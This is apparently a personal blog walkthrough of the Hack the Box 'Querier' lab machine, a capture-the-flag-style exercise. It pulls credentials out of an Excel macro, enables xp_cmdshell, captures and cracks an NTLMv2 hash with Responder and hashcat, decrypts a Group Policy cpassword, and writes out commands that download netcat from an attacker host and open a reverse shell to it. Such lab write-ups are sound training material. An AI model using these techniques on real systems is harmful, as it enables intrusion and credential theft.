• Donald Ashdown

Hack the Box Querier

Updated: Apr 20

Summary




This was an amazing machine that involved insecure file sharing services that provided credentials for an SQL server connection and basic shell. From here we pursued the classic xp_cmdshell. However permissions were denied on the xp_cmdshell and we had to utilize responder and dir/file tree to bypass the permissions by creating a rogue SMB server and forcing the mssql server authentication to our rogue server capturing the hash. From here we landed a reverse shell using command injection for an initial foothold and enumerating with winpeas and powerup. This flagged the gpo history where we found a group policy xml template with a password hash that we cracked for administrator.

Processes/Techniques

Anonymous file login

File forensics

Excel macro extraction

SQL dir/file tree permission bypass

SQL xp_cmdshell

GPO history enumeration

Reverse shell


Tools used

Impacket-mssql

Impacket-psexec

Binwalk

Winpeas

Powerup

Hashcat

Gpp Decrypt

Nishang

Impacket-SMB Server

Python simple server

Wget

Responder

Hash identifier



References

https://stackoverflow.com/questions/26750054/xp-dirtree-in-sql-server


https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/


https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wendels-small-hacking-tricks-microsoft-sql-server-edition


https://www.kali.org/tools/gpp-decrypt/


https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15


Enumeration

We start off with a simple enumeration to get a quick snapshot of what we are working with. We initially see ports for a file share and SQL service. There is no web port so we can assume we must dive deep into SQL, file share or both.


Taking our enumeration a little further we scan the target machine using the nmap default scripts with -sC and the the nmap service enumeration scripts with -sV.

We gather the host and domain FQDN names and SQL version.


File share enumeration

Let's jump into file share enumeration using the smbclient unix script that can make a connection to smb file shares from a linux host.

smbclient -L 10.129.1.147 

We initially are presented with several hidden shares that are unlikely to reveal anything, or have the permissions we require. The final share however "Reports" is not a default share name and therefore does not have default and native permissions.


Connecting into the folder with the classic anonymous login and we see the 'Currency Volume Reports.xlsm' file.


We immediately attempt to download this file with the classic mget and get commands of which neither work. Upon further investigation we list all available commands and clearly see that mget is listed. Taking a closers look, the error message from mget stated it could not find the file 'Currency' which suggests it is not capturing the whole file name due to white spaces.

So we append single quotes around the file name without success. When appending double quotes however we achieve a file download.


File Forensics

Because the file Report.xlsm stuck out like a sore thumb I jumped into forensics right away to understand what it's purpose in the lab was. Running the file command shows us it is a Excel 2007 file. Although we could actually open this in excel I am instead going to check it for hidden files because my intuition is telling me to.


Running binwalk immediately revealed hidden content in the file.


Here we find the extracted file and we notice a macro titled 'vbaProject.bin' which we want to investigate right away.


Running cat on the file we see a large amount of content. Parsing through it all we find some valuable information within,


DB = volume

Uid = reporting

Pwd = PcwTWTHRwryjc$c6

Server=Querier



SQL Connection

From here we are able to pivot into the impacket suite where we can utilize mssqlclient to make that initial connection with our newly found credentials.


python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc$c6@10.129.1.147

This however kept erroring out, so I finally escapted the $ character and it worked.

python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.129.1.147


xp_cmdshell

The xp_cmdshell literally spawns a command shell and accepts strings to execute as arguments. This is normally restricted or locked down on a system but is a common CTF target.

Here is a little guide below on the xp_cmdshell. Unfortunately it is not that easy as we can see that we do not have the needed permissions to pass commands to xp_cmdshell.


https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15




Researching this permissions error, leads me to the below resource which provides instructions on enabling the xp_cmdshell.


Reference:

https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/


The steps are shown below;

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;



Man in the middle

Researching and diving into the forums it became clear that permisions are often deployed to protect these systems there are infact may ways to circumvent such initial and basic permissions. Trust wave released an amazing article on this below. I tried many of the techniques and the one which finally worked was MITM method leveraging responder to capture the hash from the SQL auth push to a spoofed SMB server, through the use of the SQL function dirtree.


Reference; cmd_shell bypass techniques

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wendels-small-hacking-tricks-microsoft-sql-server-edition


Reference: Actual use of the command

https://stackoverflow.com/questions/26750054/xp-dirtree-in-sql-server


So I spun up a responder server

[SMB] NTLMv2-SSP Client : 10.129.1.147

[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc

[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:0e22bb333ed6c738:DE7F38F1DDF8DD5FBA04A659336A3822:010100000000000000EF18ABDBBFD7010EC138EF9A8EAE980000000002000800380037005A00540001001E00570049004E002D004F0059004F0055005600420053004E0035003400430004003400570049004E002D004F0059004F0055005600420053004E003500340043002E00380037005A0054002E004C004F00430041004C0003001400380037005A0054002E004C004F00430041004C0005001400380037005A0054002E004C004F00430041004C000700080000EF18ABDBBFD701060004000200000008003000300000000000000000000000003000005E57E89B872A66568CA654F48A9F822F9F6C264FA7A76FC823989A4D664D37FD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0035003800000000000000000000000000

[*] Skipping previously captured hash for QUERIER\mssql-svc


Can't crack the hash

I was not able to crack the hash by copying and pasting it into a file. This is because the hash is actually several blocks in length so we have to use an out file natively prepared by responder found in ./usr/share/responder/logs/SMB-NTLMV2-SSP-10.129.1.147.exe


└─$ hashcat -m 5600 SMB-NTLMv2-SSP-10.129.1.147.txt ../../../../usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...


OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

=============================================================================================================================

* Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 1423/1487 MB (512 MB allocatable), 2MCU


Minimum password length supported by kernel: 0

Maximum password length supported by kernel: 256


Hashes: 3 digests; 2 unique digests, 2 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Rules: 1


Applicable optimizers applied:

* Zero-Byte

* Not-Iterated


ATTENTION! Pure (unoptimized) backend kernels selected.

Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.

If you want to switch to optimized backend kernels, append -O to your commandline.

See the above message to find out about the exact limits.


Watchdog: Hardware monitoring interface not found on your system.

Watchdog: Temperature abort trigger disabled.


Host memory required for this attack: 64 MB


Dictionary cache building ../../../../usr/share/wordlists/rockyou.txt: 33553434 bytDictionary cache built:

* Filename..: ../../../../usr/share/wordlists/rockyou.txt

* Passwords.: 14344392

* Bytes.....: 139921507

* Keyspace..: 14344385

* Runtime...: 0 secs


MSSQL-SVC::QUERIER:0e22bb333ed6c738:de7f38f1ddf8dd5fba04a659336a3822:010100000000000000ef18abdbbfd7010ec138ef9a8eae980000000002000800380037005a00540001001e00570049004e002d004f0059004f0055005600420053004e0035003400430004003400570049004e002d004f0059004f0055005600420053004e003500340043002e00380037005a0054002e004c004f00430041004c0003001400380037005a0054002e004c004f00430041004c0005001400380037005a0054002e004c004f00430041004c000700080000ef18abdbbfd701060004000200000008003000300000000000000000000000003000005e57e89b872a66568ca654f48a9f822f9f6c264fa7a76fc823989a4d664d37fd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003800000000000000000000000000:corporate568

MSSQL-SVC::QUERIER:6bb09e5dda6a6844:5d8db413486b66f641195d5199db73bd:010100000000000000ef18abdbbfd701cfd5055faf915ecb0000000002000800380037005a00540001001e00570049004e002d004f0059004f0055005600420053004e0035003400430004003400570049004e002d004f0059004f0055005600420053004e003500340043002e00380037005a0054002e004c004f00430041004c0003001400380037005a0054002e004c004f00430041004c0005001400380037005a0054002e004c004f00430041004c000700080000ef18abdbbfd701060004000200000008003000300000000000000000000000003000005e57e89b872a66568ca654f48a9f822f9f6c264fa7a76fc823989a4d664d37fd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003800000000000000000000000000:corporate568

Session..........: hashcat

Status...........: Cracked

Hash.Name........: NetNTLMv2

Hash.Target......: SMB-NTLMv2-SSP-10.129.1.147.txt

Time.Started.....: Wed Oct 13 03:36:29 2021 (13 secs)

Time.Estimated...: Wed Oct 13 03:36:42 2021 (0 secs)

Guess.Base.......: File (../../../../usr/share/wordlists/rockyou.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.#1.........: 1313.0 kH/s (1.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8

Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts

Progress.........: 17920000/28688770 (62.46%)

Rejected.........: 0/17920000 (0.00%)

Restore.Point....: 8957952/14344385 (62.45%)

Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1

Candidates.#1....: correita.54 -> cornbread3


Started: Wed Oct 13 03:36:06 2021

Stopped: Wed Oct 13 03:36:44 2021


Privileged SQL login

Using the username and password I attempted to login but this did not work. I receieved an error that the login was from an unstrusted Domain. I thought about this for a minute and clued it I would likely need to add the host, to our /etc/hosts file in order to be recognized and therefore trusted as a safe host mapping.


mssql-svc

corporate568


After adding querier.htb to our /etc/hosts file. I proceeded to connect to the host by using the forward lookup name @querier.htb.




From here I proceeded to test the xp_cmdshell command and was denied access. However I know that this user probably has higher permissions given it is the SQL service account. So going back and referencing the trustwave article I am able to enable cmdshell and execute commands.

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

Reverse shell

File transfer of netcat with powershell wget



xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe


From here I proceeded to execute nc64.exe and pass arguments for a reverseshell.


xp_cmdshell nc64.exe -e cmd 10.10.14.27 6363

This however was not working so I decided to download the file to a defined location and calling from that defined location.


xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe -o C:\Users\mssql-svc\Downloads\nc64.exe

xp_cmdshell C:\Users\mssql-svc\Downloads\nc64.exe -e cmd 10.10.14.27 6363


Root

From here I uploaded winpeas.exe as usual, however it did not work so I back tracked to the .bat version. First I file transferred with


xp_cmdshell powershell wget http://10.10.14.27:8000/winPEAS.bat -o C:\Users\mssql-svc\Downloads\winPEAS.bat

I was able to run the script with


winPEAS.bat





But wait! Juicy potatoe does not work on server 2019 and newer, and we are running server 2019.




Upon seeing the password, I immediately elevate my shell to powershell by simply typing powershell. From here I retrieved the file and proceeded to pass the hash found within the .xml.


C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml    

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml                                        




C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups> type Groups.xml                               
type Groups.xml     
                                                                                                                                                                                    
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">                                                                                                          
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">                                                                                                                                                                                              
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>                                                                                                                           
PS C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups>       


CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ


Researching Group Policy Passwords lead me to a broader understanding and a decryption tool.

https://www.kali.org/tools/gpp-decrypt/




MyUnclesAreMarioAndLuigi !! 1!



651 views0 comments